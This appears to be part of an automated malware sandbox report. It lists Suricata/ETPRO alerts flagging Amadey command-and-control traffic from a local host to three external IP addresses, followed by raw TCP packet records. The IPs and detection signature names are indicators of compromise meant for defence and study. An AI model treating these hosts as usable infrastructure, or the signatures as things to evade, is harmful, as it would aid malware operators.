2024-08-27T14:21:31.002861+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52485	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:04.585593+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52420	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:38.626405+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52643	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:34.574146+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52231	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:41.988163+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52369	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:58.225422+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52687	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:29.030867+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52218	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:53.389610+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52393	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:03.154215+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52290	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:13.396843+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52311	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:58.806193+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52692	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:57.592620+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52279	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:14.469157+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52585	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:35.081030+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52353	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:28.738971+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52341	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:19.904550+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52458	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:20.208335+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52598	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:29.350114+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52342	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:37.492568+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52237	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:31.951527+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52479	80	192.168.2.6	89.23.103.42
2024-08-27T14:22:32.160992+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52626	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:41.198678+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52649	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:47.779581+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52382	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:55.152376+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52399	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:25.922079+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52611	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:34.023804+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52631	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:37.549586+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52502	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:31.732772+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52347	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:44.451585+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52651	80	192.168.2.6	89.23.103.42
2024-08-27T14:22:44.451585+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52656	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:12.635236+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52441	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:00.076581+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52552	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:34.784202+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52230	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:31.727775+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52624	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:23.701464+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52332	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:00.765964+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52286	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:27.718012+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52334	80	192.168.2.6	89.23.103.42
2024-08-27T14:22:25.022636+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52609	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:03.576412+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52284	80	192.168.2.6	89.23.103.42
2024-08-27T14:19:26.685437+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52214	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:26.625196+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52215	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:37.161729+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52235	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:21.850544+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52328	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:53.284285+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52677	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:57.210671+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52547	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:54.830677+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52273	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:58.836131+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52550	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:06.519310+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52563	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:08.549568+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52430	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:23.617605+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52604	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:23.920344+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52467	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:20.434260+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52325	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:30.179204+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52223	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:38.690602+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52239	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:27.017158+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52337	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:25.548861+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52472	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:25.686310+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52469	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:43.515413+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52372	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:47.400877+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52257	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:04.167934+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52554	80	192.168.2.6	89.23.103.42
2024-08-27T14:20:51.144006+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52388	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:27.935770+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52478	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:27.935770+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52477	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:25.500214+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52336	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:29.799694+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52344	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:38.834931+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52363	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:28.342259+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52617	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:33.548254+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52489	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:12.345108+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52308	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:56.269797+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52684	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:35.529320+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	52232	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:05.656962+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52564	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:48.731988+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52527	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:55.576562+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52274	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:05.340281+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52296	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:37.724981+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52361	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:31.409570+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52224	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:56.061016+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52535	80	192.168.2.6	89.23.103.42
2024-08-27T14:21:17.509511+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52450	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:42.055828+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52650	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:24.523603+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52212	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:15.984083+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52588	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:03.186935+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52417	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:06.875431+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52297	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:50.857647+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52263	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:35.967776+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52497	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:40.035794+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52644	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:50.619372+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52389	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:19.318851+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52457	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:59.826425+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52410	80	192.168.2.6	185.208.158.116
2024-08-27T14:22:36.181717+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52636	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:11.873743+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52439	80	192.168.2.6	185.209.162.226
2024-08-27T14:22:36.420333+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52629	80	192.168.2.6	89.23.103.42
2024-08-27T14:21:01.493399+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52414	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:18.354021+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52320	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:29.152275+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52221	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:31.311116+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52484	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:52.017552+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52533	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:07.229400+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52425	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:45.392615+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52375	80	192.168.2.6	185.209.162.226
2024-08-27T14:19:43.099591+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52248	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:31.732736+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52348	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:39.998348+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52499	80	192.168.2.6	89.23.103.42
2024-08-27T14:21:03.841964+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52419	80	192.168.2.6	185.209.162.226
2024-08-27T14:21:11.603792+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52438	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:07.666859+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52427	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:46.031910+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52379	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:28.131038+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52220	80	192.168.2.6	185.208.158.116
2024-08-27T14:20:19.173872+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52321	80	192.168.2.6	185.209.162.226
2024-08-27T14:20:27.616419+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52339	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:53.536640+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52538	80	192.168.2.6	185.208.158.116
2024-08-27T14:19:39.529274+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52234	80	192.168.2.6	89.23.103.42
2024-08-27T14:22:52.417787+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52674	80	192.168.2.6	185.208.158.116
2024-08-27T14:21:01.421529+0200	TCP	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	52411	80	192.168.2.6	185.209.162.226

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 27, 2024 14:19:23.435437918 CEST	52210	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:23.435532093 CEST	52211	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:23.435961962 CEST	52212	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:23.440321922 CEST	80	52210	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:23.440337896 CEST	80	52211	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:23.440421104 CEST	52210	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:23.440553904 CEST	52211	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:23.440553904 CEST	52211	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:23.440640926 CEST	52210	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:23.440716028 CEST	80	52212	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:23.440763950 CEST	52212	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:23.440836906 CEST	52212	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:23.445390940 CEST	80	52211	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:23.445456982 CEST	80	52210	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:23.445601940 CEST	80	52212	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:24.148998022 CEST	80	52212	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:24.153202057 CEST	52212	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:24.277441025 CEST	52212	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:24.284167051 CEST	80	52212	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:24.523554087 CEST	80	52212	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:24.523602962 CEST	52212	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:24.639530897 CEST	52212	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:24.639868021 CEST	52213	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:24.644829988 CEST	80	52212	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:24.644880056 CEST	52212	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:24.644881964 CEST	80	52213	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:24.644941092 CEST	52213	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:24.645291090 CEST	52213	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:24.649997950 CEST	80	52213	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:25.066091061 CEST	80	52211	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:25.066207886 CEST	52211	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:25.072505951 CEST	52211	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:25.074024916 CEST	52214	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:25.077332020 CEST	80	52211	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:25.078823090 CEST	80	52214	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:25.078917027 CEST	52214	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:25.079119921 CEST	52214	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:25.083925962 CEST	80	52214	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:25.343249083 CEST	80	52213	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:25.343316078 CEST	52213	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:25.344122887 CEST	52213	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:25.348860025 CEST	80	52213	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:25.583080053 CEST	80	52213	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:25.583529949 CEST	52213	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:25.686047077 CEST	52213	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:25.686367989 CEST	52215	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:25.691246986 CEST	80	52215	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:25.691260099 CEST	80	52213	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:25.691363096 CEST	52213	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:25.691468954 CEST	52215	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:25.691469908 CEST	52215	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:25.696301937 CEST	80	52215	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:26.385049105 CEST	80	52215	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:26.385124922 CEST	52215	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:26.385790110 CEST	52215	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:26.390639067 CEST	80	52215	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:26.625111103 CEST	80	52215	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:26.625195980 CEST	52215	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:26.685302973 CEST	80	52214	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:26.685436964 CEST	52214	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:26.685542107 CEST	52214	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:26.690377951 CEST	80	52214	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:26.732779026 CEST	52215	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:26.733056068 CEST	52216	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:26.737915039 CEST	80	52216	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:26.737988949 CEST	52216	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:26.738046885 CEST	80	52215	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:26.738087893 CEST	52215	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:26.738140106 CEST	52216	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:26.743021965 CEST	80	52216	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:26.811263084 CEST	52217	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:26.816409111 CEST	80	52217	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:26.816528082 CEST	52217	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:26.816659927 CEST	52217	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:26.821512938 CEST	80	52217	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:27.423213005 CEST	52210	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:27.423268080 CEST	52216	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:27.423314095 CEST	52217	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:27.423376083 CEST	80	52216	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:27.423438072 CEST	52216	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:27.424206972 CEST	52218	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:27.424897909 CEST	52219	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:27.425518990 CEST	52220	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:27.430473089 CEST	80	52218	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:27.430550098 CEST	52218	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:27.430649996 CEST	52218	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:27.431582928 CEST	80	52219	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:27.431643009 CEST	52219	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:27.431710005 CEST	52219	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:27.431725979 CEST	80	52220	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:27.431777954 CEST	52220	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:27.431849003 CEST	52220	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:27.435390949 CEST	80	52218	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:27.438294888 CEST	80	52219	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:27.438407898 CEST	80	52220	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:28.130945921 CEST	80	52220	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:28.131037951 CEST	52220	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:28.233077049 CEST	52220	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:28.233504057 CEST	52221	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:28.238445997 CEST	80	52220	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:28.238461971 CEST	80	52221	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:28.238538980 CEST	52220	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:28.238590002 CEST	52221	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:28.238739967 CEST	52221	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:28.243483067 CEST	80	52221	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:28.916901112 CEST	80	52221	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:28.916973114 CEST	52221	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:28.917747974 CEST	52221	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:28.922573090 CEST	80	52221	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:29.030761957 CEST	80	52218	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:29.030867100 CEST	52218	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:29.030924082 CEST	52218	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:29.035691023 CEST	80	52218	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:29.141596079 CEST	52222	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:29.146467924 CEST	80	52222	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:29.146601915 CEST	52222	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:29.146737099 CEST	52222	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:29.151544094 CEST	80	52222	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:29.152215004 CEST	80	52221	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:29.152275085 CEST	52221	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:29.264142036 CEST	52221	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:29.264463902 CEST	52223	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:29.271059036 CEST	80	52223	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:29.271127939 CEST	52223	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:29.271238089 CEST	52223	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:29.271361113 CEST	80	52221	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:29.271408081 CEST	52221	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:29.275969982 CEST	80	52223	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:29.944858074 CEST	80	52223	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:29.944916010 CEST	52223	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:29.945759058 CEST	52223	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:29.950547934 CEST	80	52223	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:30.179105043 CEST	80	52223	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:30.179203987 CEST	52223	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:30.295556068 CEST	52223	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:30.295869112 CEST	52224	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:30.300769091 CEST	80	52224	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:30.300859928 CEST	52224	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:30.300909042 CEST	80	52223	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:30.300956964 CEST	52223	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:30.301059961 CEST	52224	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:30.305867910 CEST	80	52224	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:30.748121023 CEST	80	52222	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:30.748240948 CEST	52222	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:30.748306990 CEST	52222	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:30.749038935 CEST	52225	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:30.753053904 CEST	80	52222	185.209.162.226	192.168.2.6
